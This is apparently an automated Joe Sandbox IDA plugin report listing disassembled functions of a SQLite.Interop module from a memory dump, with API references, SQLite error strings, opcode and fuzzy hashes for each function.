                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I4abff63f9a080046.Iea8388f7613ed158.$I943321d364f02e5d.
                                                                                      • String ID:
                                                                                      • API String ID: 327142530-0
                                                                                      • Opcode ID: 78a4244cb7dd7538a6c54b28cc77f443f39984c9c8f6422b1734537009e70df9
                                                                                      • Instruction ID: 624b74230a738e9f7d602c2fdb425ad15ea5a1620966079be7deebdbf2b3be94
                                                                                      • Opcode Fuzzy Hash: 78a4244cb7dd7538a6c54b28cc77f443f39984c9c8f6422b1734537009e70df9
                                                                                      • Instruction Fuzzy Hash: EA81E47150B3418BD701CF24C480E66BBE1AF9135DF284A6EE8A89BB52D731D887C7E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43ABC0 Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(FFFFFFFF), ref: 6C43AC4A
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C43AC55
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C43AC60
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,00000000), ref: 6C43ACD2
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,00000000), ref: 6C43AD49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I1c7a7970970b9619.
                                                                                      • String ID:
                                                                                      • API String ID: 3343225350-0
                                                                                      • Opcode ID: 2f4f36a04943df640b3aca1097444c85b5ee88f30e8323a44b1f663851198bbb
                                                                                      • Instruction ID: 65184fed00392364b9b6e50034e9709ccea54aedcede9509ae6e9c8e01eb5750
                                                                                      • Opcode Fuzzy Hash: 2f4f36a04943df640b3aca1097444c85b5ee88f30e8323a44b1f663851198bbb
                                                                                      • Instruction Fuzzy Hash: FF711570A483219BDF05CF66D840F5AB7A2BFC931EF14552DE85997B81D371E80A8BC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4B8960 Relevance: 7.7, APIs: 5, Instructions: 195COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?), ref: 6C4B89F3
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,6C4B88D0,?,?,?,6C449B40), ref: 6C4B8A78
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,6C4B88D0,?,?,?,6C449B40), ref: 6C4B8ADB
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?), ref: 6C4B8B4B
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?), ref: 6C4B8BBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: b17250dbdaa30b71b650b74649dd6a09bfc5a1bffa4088edf01310d13b112c19
                                                                                      • Instruction ID: 02aa1f13dd929d07b398534c022cea6f3ab8e511ac0197292f9d17c4f44efb60
                                                                                      • Opcode Fuzzy Hash: b17250dbdaa30b71b650b74649dd6a09bfc5a1bffa4088edf01310d13b112c19
                                                                                      • Instruction Fuzzy Hash: E2715F71606702CBCB25DF34D490FEBB3A1BF49305F240A2ED86A67B05D732A445CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C435C60 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C42D946,?,?,?,6C42D946,?,?,00000000,?), ref: 6C435C92
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C42D946,?,?,?,6C42D946,?,?,00000000,?), ref: 6C435CC4
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C42D946,?,?,?,?,?,?,?,6C42D946,?,?,00000000,?), ref: 6C435CF5
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C42D946,?,?,?,?,?,6C42D946,?,?,00000000,?), ref: 6C435D2F
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C42D946,?,?,?,?,?,6C42D946,?,?,00000000,?), ref: 6C435D69
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9c6d7cd7b7d38055.$I950480ab972e108d.$I1c7a7970970b9619.
                                                                                      • String ID:
                                                                                      • API String ID: 886946342-0
                                                                                      • Opcode ID: ceda9712a5e52d756d273d15d013cbf39404e42d73bb01afe7737ddd49959b4a
                                                                                      • Instruction ID: df6cef65693e1d6bfa777bac70db5b29153164806d6aab8df02c477d9d5ceb86
                                                                                      • Opcode Fuzzy Hash: ceda9712a5e52d756d273d15d013cbf39404e42d73bb01afe7737ddd49959b4a
                                                                                      • Instruction Fuzzy Hash: 69316DA6E0152463E706D126AD01FDF72AC5F9921EF185178DC0DF2B41FB25AB19C2E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43AAA0 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,?,000000FF), ref: 6C43AAC9
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C43AAE7
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,?), ref: 6C43AB26
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,?), ref: 6C43AB4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1527d54f96ad891e.$I9196a02c851acbfb.Icd6b4ac0aeff7202.
                                                                                      • String ID:
                                                                                      • API String ID: 326086725-0
                                                                                      • Opcode ID: 405134c1209dc3d60323254088874db5648936e033ed728fa7b86947d5649088
                                                                                      • Instruction ID: 417a68ee7b7c2047ef2ed6425ec3f8452534bf08b594bfad13e00a2ffa8232cb
                                                                                      • Opcode Fuzzy Hash: 405134c1209dc3d60323254088874db5648936e033ed728fa7b86947d5649088
                                                                                      • Instruction Fuzzy Hash: 81317F76614108AFDF00EF68EC41DA577A9EB49338B1482A9FD1CCB762E632D920D7C1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C416C50 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C416D2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 3208fb2b18342701438625666e0e142be29afacf22124b91038e3ce5d9c061ef
                                                                                      • Instruction ID: b7e8f3082ff00ee1ac8af127995ee75e09970bb19493185a2f4fa346aa193573
                                                                                      • Opcode Fuzzy Hash: 3208fb2b18342701438625666e0e142be29afacf22124b91038e3ce5d9c061ef
                                                                                      • Instruction Fuzzy Hash: 192149B2E4821167D711CF259C41EFB72A9DF44269F18062CFC9997F01FB20E91982D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C416D40 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C416E1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 6e52aef644df45a11f9ee377ed668661e901de246a373af796b0be88e501ac36
                                                                                      • Instruction ID: b2304043ec1ca3549caf1954c1b27d998fe317a34bec11e9ed15bffb610f174c
                                                                                      • Opcode Fuzzy Hash: 6e52aef644df45a11f9ee377ed668661e901de246a373af796b0be88e501ac36
                                                                                      • Instruction Fuzzy Hash: C42137B2E4831127D711DB209C41EFB73A9DF442A9F090728EC9897F01EB31E92982D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3DEC07 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6C3DEC10
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C3DEC33
                                                                                        • Part of subcall function 6C3D7B2E: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6C3E2DBE,00000001,00000000,?,6C3DF029,00000001,00000004,00000000,00000001,?,?,6C3D7833), ref: 6C3D7B60
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6C3DEC59
                                                                                      • _free.LIBCMT ref: 6C3DEC6C
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C3DEC7B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 2278895681-0
                                                                                      • Opcode ID: ef18bdd9dc7ea7ac43bf478ebdc446e29c860dbd93b1c44c7140a4596229e5fd
                                                                                      • Instruction ID: 856f6bad44b6f31cb8cd74fa1e9bf0350badffa7e46591524fc2aa38af6a03f5
                                                                                      • Opcode Fuzzy Hash: ef18bdd9dc7ea7ac43bf478ebdc446e29c860dbd93b1c44c7140a4596229e5fd
                                                                                      • Instruction Fuzzy Hash: 7F0175B37027157B2B1165BA6D8CC7BAE7DDAC7A583220229F914C7601DA619C0199F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D8D2C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000001,78A8D6F6,-00000004,6C3D52D2,6C3D7B1A,78A8D6F6,?,6C3D7761,00000001,00000001), ref: 6C3D8D31
                                                                                      • _free.LIBCMT ref: 6C3D8D66
                                                                                      • _free.LIBCMT ref: 6C3D8D8D
                                                                                      • SetLastError.KERNEL32(00000000,00000001), ref: 6C3D8D9A
                                                                                      • SetLastError.KERNEL32(00000000,00000001), ref: 6C3D8DA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 2bba98c3d63174b38fb1493031c9490fc0be8c17e247fca7a621d855539dcbfe
                                                                                      • Instruction ID: c85aeedff23b1405637d4adb8e8c7a242f0dffea0d7eaac9c397c116708a3e01
                                                                                      • Opcode Fuzzy Hash: 2bba98c3d63174b38fb1493031c9490fc0be8c17e247fca7a621d855539dcbfe
                                                                                      • Instruction Fuzzy Hash: A1012B372442006FC602AE3A5C44A8B213DAFD326C7271557F94492AC0DF22B80589A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C48E650 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 369COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C48E6D3
                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 6C48E6AF
                                                                                      • unknown column "%s" in foreign key definition, xrefs: 6C48E8FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                      • API String ID: 0-272990098
                                                                                      • Opcode ID: 58478c6498cf66fe0bb22f5daa53a984b1b80af8052ca8eecd0b7884cbe0718d
                                                                                      • Instruction ID: 20ba7f9c5fe46f58a5a1b19b0931e19d645261c5ff88c2bb471fc72709a5275d
                                                                                      • Opcode Fuzzy Hash: 58478c6498cf66fe0bb22f5daa53a984b1b80af8052ca8eecd0b7884cbe0718d
                                                                                      • Instruction Fuzzy Hash: 08E1BF78A02611CFDB10CF69C8C0EAABBB1FF4A309F158599D858ABB11D735E945CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41A9A0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 344COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00033B6D,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C41ADC3
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C41ADBC
                                                                                      • database corruption, xrefs: 6C41ADB7
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C41ADAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: fe2fc8150834f0cb4205b3d9f39f3b85cf40fb239fd3e4bae34f9b7cf527a7a1
                                                                                      • Instruction ID: dbcb3df759dde8516a760c84138e76184a23416e672f3f36002ec5294bdd0eb5
                                                                                      • Opcode Fuzzy Hash: fe2fc8150834f0cb4205b3d9f39f3b85cf40fb239fd3e4bae34f9b7cf527a7a1
                                                                                      • Instruction Fuzzy Hash: 55D14870608B018BD721CF29C984F66B7F2AF8570AF14492DD9D687F41E776E44ACB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4D2F60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4D305F
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4D30B5
                                                                                        • Part of subcall function 6C4D36F0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4D37BC
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000021B,recovered %d pages from %s,00000000,?,?,?,?,?,6C4CFF94,00000000,?,00000000), ref: 6C4D329A
                                                                                      Strings
                                                                                      • recovered %d pages from %s, xrefs: 6C4D3290
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$I950480ab972e108d.
                                                                                      • String ID: recovered %d pages from %s
                                                                                      • API String ID: 3441757943-1623757624
                                                                                      • Opcode ID: 25db0eebfccbd3f29b887dff161feeb6c4ba939d3ddbaee454816248d16b7f10
                                                                                      • Instruction ID: 45cca6243c10a1e32629706f434a192051d66370a588a9d28cf9624679d530c1
                                                                                      • Opcode Fuzzy Hash: 25db0eebfccbd3f29b887dff161feeb6c4ba939d3ddbaee454816248d16b7f10
                                                                                      • Instruction Fuzzy Hash: 79B167B1E01616AFDB15DBA8C8A0FAEB7B1BF48359F164268D815A7B40D730BD05CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C6260 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 223COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000116A1,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?), ref: 6C4C6474
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4C646D
                                                                                      • database corruption, xrefs: 6C4C6468
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4C645E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 2d2d9ab1d2c1c2fe26a537c233408f47a8bd52778f37f611eb5baf6bb6f07390
                                                                                      • Instruction ID: 0f620d44f36bbe09b8b9e8911417dd3e52204b0c04b1fd2e4b68a2141bd9b7b5
                                                                                      • Opcode Fuzzy Hash: 2d2d9ab1d2c1c2fe26a537c233408f47a8bd52778f37f611eb5baf6bb6f07390
                                                                                      • Instruction Fuzzy Hash: 9B719E39B042069BCB04CE69C480EE9B7B1FF45319F1486A9D858CBB61E731E895C796
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C40C290 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 187COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%z%.*s,?,?,?), ref: 6C40C324
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%z%.*s,?,00000001,?), ref: 6C40C384
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: %z%.*s
                                                                                      • API String ID: 962285590-1452872960
                                                                                      • Opcode ID: a6bd235851a54dd2e5c97bbbaed5e52bee30a86c483933113fbef433b84a8cbe
                                                                                      • Instruction ID: 53f2c5c65572312ac27e94ca36e96edd3cb03f8fdbeb3b91358f2796b49d4dec
                                                                                      • Opcode Fuzzy Hash: a6bd235851a54dd2e5c97bbbaed5e52bee30a86c483933113fbef433b84a8cbe
                                                                                      • Instruction Fuzzy Hash: 4F619B75A40605DFCB10EF6AC580E9AB7F5FF85318B148A6DD88A87F01E631F9058BA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EC370 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3EC588
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
